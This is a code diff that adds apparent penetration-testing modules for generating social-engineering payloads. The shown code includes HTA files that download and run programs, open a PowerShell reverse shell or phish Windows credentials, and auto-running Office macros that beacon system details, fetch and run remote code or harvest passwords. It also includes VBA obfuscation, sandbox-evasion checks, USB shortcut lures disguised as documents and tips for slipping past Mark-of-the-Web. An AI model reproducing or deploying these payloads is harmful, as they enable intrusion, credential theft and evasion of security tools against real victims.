+                UpdateProgress 80, "Installing..."
+
+                shell.Run filePath, 0, False
+
+                ${options.callbackUrl ? `
+                ' Callback
+                Dim callback
+                Set callback = CreateObject("MSXML2.ServerXMLHTTP")
+                callback.Open "GET", "${options.callbackUrl}?status=executed&t=hta", False
+                callback.Send
+                ` : ""}
+
+                UpdateProgress 100, "Complete!"
+                downloadComplete = True
+                setTimeout "self.close()", 2000
+            Else
+                UpdateProgress 0, "Error: Could not download update"
+            End If
+
+            Set http = Nothing
+            Set stream = Nothing
+            Set shell = Nothing
+        End Sub
+
+        Sub UpdateProgress(percent, msg)
+            document.getElementById("progress").style.width = percent & "%"
+            document.getElementById("status").innerText = msg
+        End Sub
+
+        Sub setTimeout(code, delay)
+            window.setTimeout code, delay
+        End Sub
+    </script>
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      description: "HTA that downloads and executes a payload",
+      payloadType: "download-execute",
+      content: htaContent,
+      filename: `${sanitizeFilename(options.name)}.hta`,
+      callbackUrl: options.callbackUrl,
+      targetUrl: options.downloadUrl,
+      lureContent: lure,
+      notes: [
+        "Downloads payload to %TEMP%",
+        "Shows fake progress bar UI",
+        "Executes payload silently",
+        "Closes automatically after execution",
+        `Payload filename: ${payloadFilename}`,
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Credential Prompt HTA ==========
+
+  /**
+   * Generate credential harvesting HTA.
+   */
+  export function generateCredentialHTA(options: {
+    name: string
+    callbackUrl: string
+    prompt?: string
+    title?: string
+  }): HTAPayload {
+    const title = options.title || "Windows Security"
+    const prompt = options.prompt || "Your session has expired. Please enter your credentials to continue."
+
+    const htaContent = `<!DOCTYPE html>
+<html>
+<head>
+    <title>${title}</title>
+    <HTA:APPLICATION
+        ID="SecurityPrompt"
+        APPLICATIONNAME="${title}"
+        BORDER="dialog"
+        CAPTION="yes"
+        CONTEXTMENU="no"
+        MAXIMIZEBUTTON="no"
+        MINIMIZEBUTTON="no"
+        SHOWINTASKBAR="yes"
+        SINGLEINSTANCE="yes"
+        SYSMENU="no"
+        WINDOWSTATE="normal"
+    />
+    <style>
+        body { font-family: Segoe UI, Arial, sans-serif; background: #f0f0f0; margin: 0; padding: 20px; }
+        .header { display: flex; align-items: center; margin-bottom: 20px; }
+        .icon { width: 48px; height: 48px; background: #4285f4; border-radius: 50%; display: flex; align-items: center; justify-content: center; color: white; font-size: 24px; margin-right: 15px; }
+        h2 { margin: 0; color: #333; }
+        .prompt { color: #666; margin-bottom: 20px; line-height: 1.5; }
+        .form-group { margin-bottom: 15px; }
+        label { display: block; color: #333; margin-bottom: 5px; }
+        input { width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px; font-size: 14px; box-sizing: border-box; }
+        input:focus { outline: none; border-color: #4285f4; }
+        .buttons { text-align: right; margin-top: 20px; }
+        button { padding: 10px 20px; margin-left: 10px; border: none; border-radius: 4px; cursor: pointer; font-size: 14px; }
+        .btn-primary { background: #4285f4; color: white; }
+        .btn-secondary { background: #e0e0e0; color: #333; }
+        .error { color: #d32f2f; margin-top: 10px; display: none; }
+    </style>
+</head>
+<body>
+    <div class="header">
+        <div class="icon">🔒</div>
+        <h2>${title}</h2>
+    </div>
+    <p class="prompt">${prompt}</p>
+
+    <div class="form-group">
+        <label>Username</label>
+        <input type="text" id="username" placeholder="domain\\username or email">
+    </div>
+    <div class="form-group">
+        <label>Password</label>
+        <input type="password" id="password" placeholder="Password">
+    </div>
+    <div class="error" id="error">Invalid credentials. Please try again.</div>
+
+    <div class="buttons">
+        <button class="btn-secondary" onclick="self.close()">Cancel</button>
+        <button class="btn-primary" onclick="submitCredentials()">OK</button>
+    </div>
+
+    <script language="VBScript">
+        Sub submitCredentials()
+            On Error Resume Next
+
+            Dim username, password, http, url
+
+            username = document.getElementById("username").value
+            password = document.getElementById("password").value
+
+            If username = "" Or password = "" Then
+                document.getElementById("error").style.display = "block"
+                Exit Sub
+            End If
+
+            ' Send credentials
+            Set http = CreateObject("MSXML2.ServerXMLHTTP")
+            url = "${options.callbackUrl}"
+
+            http.Open "POST", url, False
+            http.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
+            http.Send "username=" & username & "&password=" & password & "&source=hta"
+
+            Set http = Nothing
+
+            ' Close after sending
+            self.close()
+        End Sub
+    </script>
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      description: "HTA credential harvester disguised as Windows prompt",
+      payloadType: "credential-prompt",
+      content: htaContent,
+      filename: `${sanitizeFilename(options.name)}.hta`,
+      callbackUrl: options.callbackUrl,
+      lureContent: prompt,
+      notes: [
+        "Mimics Windows security dialog",
+        "Sends credentials via HTTP POST",
+        "Dialog style window",
+        "No taskbar minimize button",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Reverse Shell HTA ==========
+
+  /**
+   * Generate reverse shell HTA.
+   */
+  export function generateReverseShellHTA(options: {
+    name: string
+    listenerIP: string
+    listenerPort: number
+    lureMessage?: string
+  }): HTAPayload {
+    const lure = options.lureMessage || "Loading application..."
+
+    const htaContent = `<!DOCTYPE html>
+<html>
+<head>
+    <title>Application Loader</title>
+    <HTA:APPLICATION ID="Loader" APPLICATIONNAME="Loader" SHOWINTASKBAR="no" />
+    <style>
+        body { font-family: Arial; text-align: center; padding-top: 50px; }
+        .spinner { width: 50px; height: 50px; border: 5px solid #f3f3f3; border-top: 5px solid #3498db; border-radius: 50%; animation: spin 1s linear infinite; margin: 0 auto; }
+        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
+    </style>
+</head>
+<body>
+    <div class="spinner"></div>
+    <p>${lure}</p>
+
+    <script language="VBScript">
+        Sub Window_OnLoad()
+            ' Minimize/hide window
+            self.moveTo -2000, -2000
+            self.resizeTo 1, 1
+
+            ' Execute reverse shell
+            ExecuteShell
+        End Sub
+
+        Sub ExecuteShell()
+            On Error Resume Next
+
+            Dim shell, cmd
+
+            Set shell = CreateObject("WScript.Shell")
+
+            cmd = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """
+            cmd = cmd & "$client = New-Object System.Net.Sockets.TCPClient('${options.listenerIP}',${options.listenerPort});"
+            cmd = cmd & "$stream = $client.GetStream();"
+            cmd = cmd & "[byte[]]$bytes = 0..65535|%{0};"
+            cmd = cmd & "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
+            cmd = cmd & "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
+            cmd = cmd & "$sendback = (iex $data 2>&1 | Out-String );"
+            cmd = cmd & "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
+            cmd = cmd & "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
+            cmd = cmd & "$stream.Write($sendbyte,0,$sendbyte.Length);"
+            cmd = cmd & "$stream.Flush()};$client.Close()"""
+
+            shell.Run cmd, 0, False
+
+            ' Close HTA
+            self.close()
+        End Sub
+    </script>
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      description: "HTA reverse shell payload",
+      payloadType: "reverse-shell",
+      content: htaContent,
+      filename: `${sanitizeFilename(options.name)}.hta`,
+      lureContent: lure,
+      notes: [
+        "Establishes PowerShell reverse shell",
+        "Window hides immediately",
+        `Connects to ${options.listenerIP}:${options.listenerPort}`,
+        "Set up listener before deployment: nc -lvnp " + options.listenerPort,
+        "IMPORTANT: Only use in authorized testing",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Utilities ==========
+
+  /**
+   * Sanitize filename.
+   */
+  function sanitizeFilename(name: string): string {
+    return name.replace(/[^a-zA-Z0-9_-]/g, "_")
+  }
+
+  /**
+   * HTA delivery methods.
+   */
+  export const DELIVERY_METHODS = [
+    {
+      method: "email-attachment",
+      description: "Attach HTA directly to email",
+      notes: "May be blocked by email filters",
+    },
+    {
+      method: "zip-archive",
+      description: "Place HTA in password-protected ZIP",
+      notes: "Include password in email body",
+    },
+    {
+      method: "iso-image",
+      description: "Bundle HTA in ISO file",
+      notes: "Bypasses Mark-of-the-Web in some cases",
+    },
+    {
+      method: "url-shortcut",
+      description: "Create .url file pointing to hosted HTA",
+      notes: "HTA must be hosted on web server",
+    },
+    {
+      method: "usb-drop",
+      description: "Place on USB drive for physical drop",
+      notes: "Combine with document lure names",
+    },
+  ]
+
+  // ========== Formatting ==========
+
+  /**
+   * Format HTA payload for display.
+   */
+  export function formatPayload(payload: HTAPayload): string {
+    const lines: string[] = []
+
+    lines.push(`HTA Payload: ${payload.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Type: ${payload.payloadType}`)
+    lines.push(`Filename: ${payload.filename}`)
+    if (payload.callbackUrl) {
+      lines.push(`Callback: ${payload.callbackUrl}`)
+    }
+    if (payload.targetUrl) {
+      lines.push(`Target URL: ${payload.targetUrl}`)
+    }
+    lines.push("")
+    lines.push("Description:")
+    lines.push(`  ${payload.description}`)
+    lines.push("")
+    lines.push("Notes:")
+    for (const note of payload.notes) {
+      lines.push(`  • ${note}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format delivery methods.
+   */
+  export function formatDeliveryMethods(): string {
+    const lines: string[] = []
+
+    lines.push("HTA Delivery Methods")
+    lines.push("=".repeat(40))
+
+    for (const method of DELIVERY_METHODS) {
+      lines.push("")
+      lines.push(`📦 ${method.method}`)
+      lines.push(`   ${method.description}`)
+      lines.push(`   Note: ${method.notes}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/payloads/index.ts b/packages/opencode/src/pentest/soceng/payloads/index.ts
new file mode 100644
index 00000000000..077b0aa9072
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/payloads/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Payloads Module
+ *
+ * Social engineering payload generation for various delivery methods.
+ *
+ * @module pentest/soceng/payloads
+ */
+
+export { USBPayloads } from "./usb"
+export { DocumentPayloads } from "./documents"
+export { MacroPayloads } from "./macros"
+export { HTAPayloads } from "./hta"
diff --git a/packages/opencode/src/pentest/soceng/payloads/macros.ts b/packages/opencode/src/pentest/soceng/payloads/macros.ts
new file mode 100644
index 00000000000..731d79743a7
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/payloads/macros.ts
@@ -0,0 +1,541 @@
+/**
+ * @fileoverview Macro Payload Generation
+ *
+ * VBA macro payloads for Office documents.
+ *
+ * @module pentest/soceng/payloads/macros
+ */
+
+import { SocEngStorage } from "../storage"
+
+/**
+ * Macro payloads namespace.
+ */
+export namespace MacroPayloads {
+  // ========== Macro Types ==========
+
+  /**
+   * Macro execution method.
+   */
+  export type MacroTrigger =
+    | "auto_open"
+    | "document_open"
+    | "workbook_open"
+    | "auto_close"
+    | "button_click"
+
+  /**
+   * Macro payload type.
+   */
+  export type MacroPayloadType =
+    | "beacon"
+    | "download-execute"
+    | "reverse-shell"
+    | "credential-harvest"
+    | "persistence"
+
+  /**
+   * Macro payload definition.
+   */
+  export interface MacroPayload {
+    id: string
+    name: string
+    description: string
+    trigger: MacroTrigger
+    payloadType: MacroPayloadType
+    vbaCode: string
+    obfuscated: boolean
+    antiAnalysis: boolean
+    targetApplication: "word" | "excel" | "both"
+    notes: string[]
+    createdAt: number
+  }
+
+  // ========== Beacon Payloads ==========
+
+  /**
+   * Generate simple beacon macro.
+   */
+  export function generateBeaconMacro(options: {
+    callbackUrl: string
+    trigger?: MacroTrigger
+  }): MacroPayload {
+    const trigger = options.trigger || "auto_open"
+
+    const vbaCode = `
+' Beacon Macro
+' Sends HTTP callback with system info
+
+${getTriggerSub(trigger)}
+    BeaconHome
+End Sub
+
+Private Sub BeaconHome()
+    On Error Resume Next
+
+    Dim http As Object
+    Dim url As String
+    Dim user As String
+    Dim comp As String
+    Dim domain As String
+
+    Set http = CreateObject("MSXML2.ServerXMLHTTP")
+
+    user = Environ("USERNAME")
+    comp = Environ("COMPUTERNAME")
+    domain = Environ("USERDOMAIN")
+
+    url = "${options.callbackUrl}?u=" & user & "&c=" & comp & "&d=" & domain
+
+    http.Open "GET", url, False
+    http.setRequestHeader "User-Agent", "Mozilla/5.0"
+    http.Send
+
+    Set http = Nothing
+End Sub
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: "Simple Beacon",
+      description: "HTTP callback with system information",
+      trigger,
+      payloadType: "beacon",
+      vbaCode,
+      obfuscated: false,
+      antiAnalysis: false,
+      targetApplication: "both",
+      notes: [
+        "Simple HTTP GET beacon",
+        "Sends username, computername, and domain",
+        "No persistence mechanism",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate PowerShell beacon macro.
+   */
+  export function generatePowerShellBeacon(options: {
+    callbackUrl: string
+    trigger?: MacroTrigger
+  }): MacroPayload {
+    const trigger = options.trigger || "auto_open"
+
+    const vbaCode = `
+' PowerShell Beacon Macro
+' Executes PowerShell to beacon home
+
+${getTriggerSub(trigger)}
+    ExecuteBeacon
+End Sub
+
+Private Sub ExecuteBeacon()
+    On Error Resume Next
+
+    Dim shell As Object
+    Dim cmd As String
+
+    Set shell = CreateObject("WScript.Shell")
+
+    cmd = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """
+    cmd = cmd & "$u=$env:USERNAME;$c=$env:COMPUTERNAME;$d=$env:USERDOMAIN;"
+    cmd = cmd & "Invoke-WebRequest -Uri '${options.callbackUrl}?u=$u&c=$c&d=$d' -UseBasicParsing"
+    cmd = cmd & """"
+
+    shell.Run cmd, 0, False
+
+    Set shell = Nothing
+End Sub
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: "PowerShell Beacon",
+      description: "PowerShell-based HTTP callback",
+      trigger,
+      payloadType: "beacon",
+      vbaCode,
+      obfuscated: false,
+      antiAnalysis: false,
+      targetApplication: "both",
+      notes: [
+        "Uses PowerShell for beacon",
+        "Runs hidden window",
+        "Bypasses execution policy",
+        "May be flagged by AV/EDR",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Download & Execute Payloads ==========
+
+  /**
+   * Generate download and execute macro.
+   */
+  export function generateDownloadExecute(options: {
+    downloadUrl: string
+    filename?: string
+    callbackUrl?: string
+    trigger?: MacroTrigger
+  }): MacroPayload {
+    const trigger = options.trigger || "auto_open"
+    const filename = options.filename || "update.exe"
+
+    const vbaCode = `
+' Download and Execute Macro
+' Downloads payload and executes it
+
+${getTriggerSub(trigger)}
+    DownloadAndRun
+End Sub
+
+Private Sub DownloadAndRun()
+    On Error Resume Next
+
+    Dim http As Object
+    Dim stream As Object
+    Dim shell As Object
+    Dim filePath As String
+
+    filePath = Environ("TEMP") & "\\${filename}"
+
+    ' Download file
+    Set http = CreateObject("MSXML2.ServerXMLHTTP")
+    http.Open "GET", "${options.downloadUrl}", False
+    http.Send
+
+    If http.Status = 200 Then
+        Set stream = CreateObject("ADODB.Stream")
+        stream.Open
+        stream.Type = 1 ' Binary
+        stream.Write http.responseBody
+        stream.SaveToFile filePath, 2
+        stream.Close
+
+        ' Execute
+        Set shell = CreateObject("WScript.Shell")
+        shell.Run filePath, 0, False
+
+        ${options.callbackUrl ? `
+        ' Callback
+        Dim callback As Object
+        Set callback = CreateObject("MSXML2.ServerXMLHTTP")
+        callback.Open "GET", "${options.callbackUrl}?status=executed", False
+        callback.Send
+        ` : ""}
+    End If
+
+    Set http = Nothing
+    Set stream = Nothing
+    Set shell = Nothing
+End Sub
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: "Download and Execute",
+      description: "Downloads and executes remote payload",
+      trigger,
+      payloadType: "download-execute",
+      vbaCode,
+      obfuscated: false,
+      antiAnalysis: false,
+      targetApplication: "both",
+      notes: [
+        "Downloads payload to TEMP folder",
+        "Executes with hidden window",
+        "Requires hosted payload at downloadUrl",
+        "Consider using AMSI bypass for AV evasion",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Credential Harvesting ==========
+
+  /**
+   * Generate credential harvesting macro.
+   */
+  export function generateCredentialHarvest(options: {
+    callbackUrl: string
+    prompt?: string
+    trigger?: MacroTrigger
+  }): MacroPayload {
+    const trigger = options.trigger || "auto_open"
+    const prompt =
+      options.prompt ||
+      "Your session has expired. Please enter your credentials to continue:"
+
+    const vbaCode = `
+' Credential Harvesting Macro
+' Displays fake prompt and sends credentials
+
+${getTriggerSub(trigger)}
+    HarvestCredentials
+End Sub
+
+Private Sub HarvestCredentials()
+    On Error Resume Next
+
+    Dim username As String
+    Dim password As String
+    Dim http As Object
+
+    ' Get username
+    username = InputBox("${prompt}" & vbCrLf & vbCrLf & "Username:", "Security Verification")
+
+    If username = "" Then Exit Sub
+
+    ' Get password
+    password = InputBox("Password for " & username & ":", "Security Verification")
+
+    If password = "" Then Exit Sub
+
+    ' Send credentials
+    Set http = CreateObject("MSXML2.ServerXMLHTTP")
+    http.Open "POST", "${options.callbackUrl}", False
+    http.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
+    http.Send "u=" & username & "&p=" & password
+
+    ' Show success
+    MsgBox "Thank you. Your session has been restored.", vbInformation, "Success"
+
+    Set http = Nothing
+End Sub
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: "Credential Harvester",
+      description: "Fake prompt to harvest credentials",
+      trigger,
+      payloadType: "credential-harvest",
+      vbaCode,
+      obfuscated: false,
+      antiAnalysis: false,
+      targetApplication: "both",
+      notes: [
+        "Displays InputBox prompts",
+        "Sends credentials via HTTP POST",
+        "Shows success message after capture",
+        "Simple but effective for awareness testing",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Obfuscation ==========
+
+  /**
+   * Obfuscate VBA code.
+   */
+  export function obfuscateVBA(code: string, level: "light" | "medium" | "heavy"): string {
+    let obfuscated = code
+
+    if (level === "light" || level === "medium" || level === "heavy") {
+      // String concatenation
+      obfuscated = obfuscated.replace(
+        /"([^"]+)"/g,
+        (_, str) => {
+          if (str.length > 10) {
+            const mid = Math.floor(str.length / 2)
+            return `"${str.substring(0, mid)}" & "${str.substring(mid)}"`
+          }
+          return `"${str}"`
+        }
+      )
+    }
+
+    if (level === "medium" || level === "heavy") {
+      // Variable name obfuscation
+      const varMap: Record<string, string> = {}
+      let counter = 0
+
+      obfuscated = obfuscated.replace(
+        /\b(Dim|Set)\s+(\w+)/g,
+        (match, keyword, varName) => {
+          if (!varMap[varName]) {
+            varMap[varName] = `v${counter++}`
+          }
+          return `${keyword} ${varMap[varName]}`
+        }
+      )
+
+      // Replace variable uses
+      for (const [orig, obf] of Object.entries(varMap)) {
+        obfuscated = obfuscated.replace(new RegExp(`\\b${orig}\\b`, "g"), obf)
+      }
+    }
+
+    if (level === "heavy") {
+      // Add junk code
+      const junkLines = [
+        "Dim junk1 As Integer: junk1 = 0",
+        "If False Then MsgBox \"\"",
+        "Dim junk2 As String: junk2 = \"\"",
+      ]
+
+      const lines = obfuscated.split("\n")
+      const newLines: string[] = []
+
+      for (const line of lines) {
+        newLines.push(line)
+        if (Math.random() > 0.7 && !line.trim().startsWith("'")) {
+          newLines.push(junkLines[Math.floor(Math.random() * junkLines.length)])
+        }
+      }
+
+      obfuscated = newLines.join("\n")
+    }
+
+    return obfuscated
+  }
+
+  /**
+   * Add anti-analysis checks to macro.
+   */
+  export function addAntiAnalysis(code: string): string {
+    const antiAnalysisCode = `
+' Anti-analysis checks
+Private Function IsSafe() As Boolean
+    On Error Resume Next
+    IsSafe = True
+
+    ' Check for common sandbox usernames
+    Dim user As String
+    user = LCase(Environ("USERNAME"))
+    If InStr(user, "sandbox") > 0 Or InStr(user, "malware") > 0 Or _
+       InStr(user, "virus") > 0 Or InStr(user, "sample") > 0 Then
+        IsSafe = False
+        Exit Function
+    End If
+
+    ' Check for low memory (sandbox indicator)
+    Dim memCheck As Object
+    Set memCheck = GetObject("winmgmts:").ExecQuery("Select * from Win32_ComputerSystem")
+    Dim item As Object
+    For Each item In memCheck
+        If item.TotalPhysicalMemory < 2147483648 Then ' Less than 2GB
+            IsSafe = False
+            Exit Function
+        End If
+    Next
+
+    ' Check for recent files (sandboxes often have none)
+    If Dir(Environ("USERPROFILE") & "\\Documents\\*.*") = "" Then
+        IsSafe = False
+        Exit Function
+    End If
+End Function
+`
+
+    // Add check to beginning of main sub
+    const modifiedCode = code.replace(
+      /(Sub \w+[\r\n]+)/,
+      `$1    If Not IsSafe() Then Exit Sub\n`
+    )
+
+    return antiAnalysisCode + "\n" + modifiedCode
+  }
+
+  // ========== Utility Functions ==========
+
+  /**
+   * Get trigger subroutine based on type.
+   */
+  function getTriggerSub(trigger: MacroTrigger): string {
+    const triggers: Record<MacroTrigger, string> = {
+      auto_open: "Sub AutoOpen()\n    ' Word auto-trigger",
+      document_open: "Private Sub Document_Open()\n    ' Word document open",
+      workbook_open: "Private Sub Workbook_Open()\n    ' Excel workbook open",
+      auto_close: "Sub AutoClose()\n    ' Triggers on close",
+      button_click: "Sub ButtonClick()\n    ' Manual trigger",
+    }
+    return triggers[trigger]
+  }
+
+  // ========== Macro Templates ==========
+
+  /**
+   * Available macro templates.
+   */
+  export const MACRO_TEMPLATES = [
+    {
+      id: "beacon-simple",
+      name: "Simple Beacon",
+      description: "HTTP callback with basic system info",
+      payloadType: "beacon" as MacroPayloadType,
+    },
+    {
+      id: "beacon-ps",
+      name: "PowerShell Beacon",
+      description: "PowerShell-based beacon with more details",
+      payloadType: "beacon" as MacroPayloadType,
+    },
+    {
+      id: "download-exec",
+      name: "Download & Execute",
+      description: "Download and run remote payload",
+      payloadType: "download-execute" as MacroPayloadType,
+    },
+    {
+      id: "cred-harvest",
+      name: "Credential Harvester",
+      description: "Fake prompt to capture credentials",
+      payloadType: "credential-harvest" as MacroPayloadType,
+    },
+  ]
+
+  // ========== Formatting ==========
+
+  /**
+   * Format macro payload for display.
+   */
+  export function formatMacro(payload: MacroPayload): string {
+    const lines: string[] = []
+
+    lines.push(`Macro: ${payload.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Type: ${payload.payloadType}`)
+    lines.push(`Trigger: ${payload.trigger}`)
+    lines.push(`Application: ${payload.targetApplication}`)
+    lines.push(`Obfuscated: ${payload.obfuscated ? "Yes" : "No"}`)
+    lines.push(`Anti-Analysis: ${payload.antiAnalysis ? "Yes" : "No"}`)
+    lines.push("")
+    lines.push("Description:")
+    lines.push(`  ${payload.description}`)
+    lines.push("")
+    lines.push("Notes:")
+    for (const note of payload.notes) {
+      lines.push(`  • ${note}`)
+    }
+    lines.push("")
+    lines.push("VBA Code:")
+    lines.push("-".repeat(40))
+    lines.push(payload.vbaCode)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format template list.
+   */
+  export function formatTemplateList(): string {
+    const lines: string[] = []
+
+    lines.push("Macro Templates")
+    lines.push("=".repeat(40))
+
+    for (const template of MACRO_TEMPLATES) {
+      lines.push("")
+      lines.push(`📝 ${template.name} (${template.id})`)
+      lines.push(`   Type: ${template.payloadType}`)
+      lines.push(`   ${template.description}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/payloads/usb.ts b/packages/opencode/src/pentest/soceng/payloads/usb.ts
new file mode 100644
index 00000000000..6e58465e8eb
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/payloads/usb.ts
@@ -0,0 +1,527 @@
+/**
+ * @fileoverview USB Drop Payloads
+ *
+ * USB drop payload generation for physical social engineering tests.
+ *
+ * @module pentest/soceng/payloads/usb
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+
+/**
+ * USB payloads namespace.
+ */
+export namespace USBPayloads {
+  // ========== USB Payload Types ==========
+
+  /**
+   * USB payload type.
+   */
+  export type USBPayloadType =
+    | "autorun"
+    | "lnk-file"
+    | "hid-attack"
+    | "badusb"
+    | "document-lure"
+
+  /**
+   * USB payload definition.
+   */
+  export interface USBPayload {
+    id: string
+    name: string
+    type: USBPayloadType
+    description: string
+    files: USBFile[]
+    callbackUrl?: string
+    trackingEnabled: boolean
+    notes: string[]
+    createdAt: number
+  }
+
+  /**
+   * File on USB drive.
+   */
+  export interface USBFile {
+    name: string
+    content: string
+    type: "script" | "shortcut" | "document" | "executable" | "config"
+    hidden: boolean
+  }
+
+  // ========== LNK File Payloads ==========
+
+  /**
+   * LNK file payload options.
+   */
+  export interface LNKPayloadOptions {
+    name: string
+    displayName: string
+    icon: "folder" | "pdf" | "word" | "excel" | "image"
+    callbackUrl: string
+    command?: string
+  }
+
+  /**
+   * Generate LNK file payload structure.
+   */
+  export function generateLNKPayload(options: LNKPayloadOptions): USBPayload {
+    const iconMap: Record<string, string> = {
+      folder: "%SystemRoot%\\System32\\shell32.dll,3",
+      pdf: "%ProgramFiles%\\Adobe\\Acrobat\\Acrobat.exe,0",
+      word: "%ProgramFiles%\\Microsoft Office\\root\\Office16\\WINWORD.EXE,0",
+      excel: "%ProgramFiles%\\Microsoft Office\\root\\Office16\\EXCEL.EXE,0",
+      image: "%SystemRoot%\\System32\\imageres.dll,67",
+    }
+
+    // PowerShell command to beacon back
+    const psCommand = options.command || generateBeaconCommand(options.callbackUrl)
+
+    const lnkScript = `
+; AutoHotkey script to create LNK file
+; Run this on attacker machine to generate the .lnk file
+
+FileCreateShortcut, powershell.exe, ${options.displayName}.lnk
+, , -WindowStyle Hidden -ExecutionPolicy Bypass -Command "${psCommand}"
+, , , ${iconMap[options.icon]}
+`
+
+    // Alternative: PowerShell script to create LNK
+    const psCreateScript = `
+$WshShell = New-Object -ComObject WScript.Shell
+$Shortcut = $WshShell.CreateShortcut("${options.displayName}.lnk")
+$Shortcut.TargetPath = "powershell.exe"
+$Shortcut.Arguments = "-WindowStyle Hidden -ExecutionPolicy Bypass -Command \`"${psCommand.replace(/"/g, '`"')}\`""
+$Shortcut.IconLocation = "${iconMap[options.icon]}"
+$Shortcut.Save()
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "lnk-file",
+      description: `LNK shortcut disguised as ${options.icon}`,
+      files: [
+        {
+          name: "create_lnk.ps1",
+          content: psCreateScript,
+          type: "script",
+          hidden: false,
+        },
+        {
+          name: "create_lnk.ahk",
+          content: lnkScript,
+          type: "script",
+          hidden: false,
+        },
+      ],
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      notes: [
+        "Run create_lnk.ps1 on attacker machine to generate .lnk file",
+        "Place generated .lnk file on USB drive",
+        `Appears as ${options.icon} icon to victims`,
+        "Executes hidden PowerShell when clicked",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate beacon/callback command.
+   */
+  function generateBeaconCommand(callbackUrl: string): string {
+    return `$h='${callbackUrl}';$u=$env:USERNAME;$c=$env:COMPUTERNAME;Invoke-WebRequest -Uri \\"$h?u=$u&c=$c\\" -UseBasicParsing`
+  }
+
+  // ========== Document Lure Payloads ==========
+
+  /**
+   * Document lure options.
+   */
+  export interface DocumentLureOptions {
+    name: string
+    documentType: "resume" | "payroll" | "confidential" | "photos" | "passwords"
+    callbackUrl: string
+  }
+
+  /**
+   * Generate document lure payload.
+   */
+  export function generateDocumentLure(options: DocumentLureOptions): USBPayload {
+    const lureNames: Record<string, string[]> = {
+      resume: [
+        "Resume_2024.docx.lnk",
+        "CV_JohnSmith.docx.lnk",
+        "My Resume.docx.lnk",
+      ],
+      payroll: [
+        "Q4_Salaries_Confidential.xlsx.lnk",
+        "Payroll_2024.xlsx.lnk",
+        "Employee_Compensation.xlsx.lnk",
+      ],
+      confidential: [
+        "Confidential_Merger_Details.docx.lnk",
+        "Project_X_Plans.docx.lnk",
+        "CONFIDENTIAL.docx.lnk",
+      ],
+      photos: [
+        "Vacation_Photos.lnk",
+        "Party_Pictures.lnk",
+        "My Photos.lnk",
+      ],
+      passwords: [
+        "passwords.txt.lnk",
+        "Important_Passwords.txt.lnk",
+        "login_credentials.txt.lnk",
+      ],
+    }
+
+    const files: USBFile[] = []
+
+    // Create multiple lure files
+    for (const lureName of lureNames[options.documentType]) {
+      files.push({
+        name: lureName,
+        content: `; Shortcut targeting: powershell -WindowStyle Hidden -Command "${generateBeaconCommand(options.callbackUrl)}"`,
+        type: "shortcut",
+        hidden: false,
+      })
+    }
+
+    // Add a hidden real file to look legitimate
+    files.push({
+      name: "desktop.ini",
+      content: `[.ShellClassInfo]
+IconResource=%SystemRoot%\\System32\\shell32.dll,3`,
+      type: "config",
+      hidden: true,
+    })
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "document-lure",
+      description: `USB lure with ${options.documentType} themed documents`,
+      files,
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      notes: [
+        "USB drive should appear partially used",
+        "Add some legitimate files for realism",
+        `Lure theme: ${options.documentType}`,
+        "Target curiosity/greed psychology",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== HID Attack Scripts ==========
+
+  /**
+   * HID attack options (BadUSB/Rubber Ducky).
+   */
+  export interface HIDAttackOptions {
+    name: string
+    platform: "windows" | "macos" | "linux"
+    objective: "reverse-shell" | "credential-harvest" | "data-exfil" | "beacon"
+    callbackUrl: string
+    delay?: number
+  }
+
+  /**
+   * Generate HID attack script (Rubber Ducky style).
+   */
+  export function generateHIDScript(options: HIDAttackOptions): USBPayload {
+    const delay = options.delay || 1000
+
+    let script = ""
+
+    if (options.platform === "windows") {
+      script = generateWindowsHIDScript(options, delay)
+    } else if (options.platform === "macos") {
+      script = generateMacOSHIDScript(options, delay)
+    } else {
+      script = generateLinuxHIDScript(options, delay)
+    }
+
+    return {
